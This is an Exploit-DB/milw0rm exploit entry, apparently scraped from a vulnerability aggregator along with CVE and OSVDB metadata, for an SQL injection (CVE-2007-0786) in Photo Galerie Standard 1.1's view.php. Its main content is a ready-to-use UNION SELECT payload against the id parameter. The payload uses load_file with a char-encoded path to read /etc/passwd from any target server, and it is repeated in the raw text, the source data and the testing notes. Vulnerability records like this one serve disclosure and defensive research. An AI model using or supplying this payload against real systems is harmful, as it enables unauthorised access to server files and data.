ID EDB-ID:3261
Type exploitdb
Reporter ajann
Modified 2007-02-03T00:00:00
Description
Photo Galerie Standard <= 1.1 (view.php) SQL Injection Vulnerability. CVE-2007-0786. Webapps exploit for php platform
*******************************************************************************
# Title : Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://noname-media.com
# $$ : Free
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//view.php?id=[SQL]
Example:
etc/passwd Read
//view.php?id=-1%20union%20select%201,load_file(char((47,101,116,99,47,112,97,115,115,119,100)),3,4,0,0,0,0,0,0,0,0,0,0/*&categorie=8&next=1
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-02-03]
{"id": "EDB-ID:3261", "hash": "34ff4b0f017bf3f22517fe555e151eaa", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Photo Galerie Standard <= 1.1 view.php SQL Injection Vulnerability", "description": "Photo Galerie Standard <= 1.1 (view.php) SQL Injection Vulnerability. CVE-2007-0786. Webapps exploit for php platform", "published": "2007-02-03T00:00:00", "modified": "2007-02-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3261/", "reporter": "ajann", "references": [], "cvelist": ["CVE-2007-0786"], "lastseen": "2016-01-31T18:04:57", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2016-01-31T18:04:57"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0786"]}, {"type": "osvdb", "idList": ["OSVDB:33089"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7191"]}], "modified": "2016-01-31T18:04:57"}, "vulnersScore": 7.7}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3261/", "sourceData": "*******************************************************************************\n# Title : Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability\n# Author : ajann\n# Contact : :(\n# S.Page : http://noname-media.com\n# $$ : Free\n\n*******************************************************************************\n\n[[SQL]]]---------------------------------------------------------\n\nhttp://[target]/[path]//view.php?id=[SQL]\n\nExample:\n\netc/passwd Read\n\n//view.php?id=-1%20union%20select%201,load_file(char((47,101,116,99,47,112,97,115,115,119,100)),3,4,0,0,0,0,0,0,0,0,0,0/*&categorie=8&next=1\n\n[[/SQL]]\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# ajann,Turkey\n# ...\n\n# Im not Hacker!\n\n# milw0rm.com [2007-02-03]\n", "osvdbidlist": ["33089"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in view.php in Noname Media Photo Galerie Standard 1.1.1 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.", "modified": "2017-10-19T01:30:00", "id": "CVE-2007-0786", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0786", "published": "2007-02-06T19:28:00", "title": "CVE-2007-0786", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "## Manual Testing Notes\n/view.php?id=-1%20union%20select%201,load_file(char((47,101,116,99,47,112,97,115,115,119,100)),3,4,0,0,0,0,0,0,0,0,0,0/*&categorie=8&next=1\n## References:\nVendor URL: http://noname-media.com/\n[Secunia Advisory ID:24029](https://secuniaresearch.flexerasoftware.com/advisories/24029/)\nOther Advisory URL: http://milw0rm.com/exploits/3261\nFrSIRT Advisory: ADV-2007-0475\n[CVE-2007-0786](https://vulners.com/cve/CVE-2007-0786)\nBugtraq ID: 22384\n", "modified": "2007-02-03T10:03:42", "published": "2007-02-03T10:03:42", "href": "https://vulners.com/osvdb/OSVDB:33089", "id": "OSVDB:33089", "title": "Photo Galerie Script view.php id Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-02-07T00:00:00", "published": "2007-02-07T00:00:00", "id": "SECURITYVULNS:VULN:7191", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7191", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}